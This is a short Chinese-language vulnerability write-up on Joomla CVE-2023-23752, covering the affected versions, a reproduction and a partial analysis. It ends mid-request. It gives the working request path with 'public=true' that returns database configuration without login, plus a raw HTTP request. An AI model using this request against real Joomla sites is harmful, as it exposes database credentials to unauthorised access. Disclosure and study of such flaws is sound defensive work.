Joomla未授权访问(CVE-2023-23752)

文章目录

  • 漏洞简介
  • 影响版本
  • 漏洞复现
  • 漏洞分析

漏洞简介

在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,在Joomla受影响的版本中由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。

影响版本

4.0.0 <= Joomla <= 4.2.7

漏洞复现

构造路由 /api/index.php/v1/config/application?public=true​

返回了数据库的相关信息
Joomla未授权访问(CVE-2023-23752)_第1张图片

漏洞分析

经过调试分析发现是对 api 路径下的身份校验进行了绕过,默认在未登录的情况下访问 返回 {“errors”:[{“title”:“Forbidden”}]}​

当 public 为false 时,是禁止外部访问的

GET /api/index.php/v1/config/application HTTP/1.1
Host: xxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,

你可能感兴趣的:(漏洞,php,开发语言,网络安全)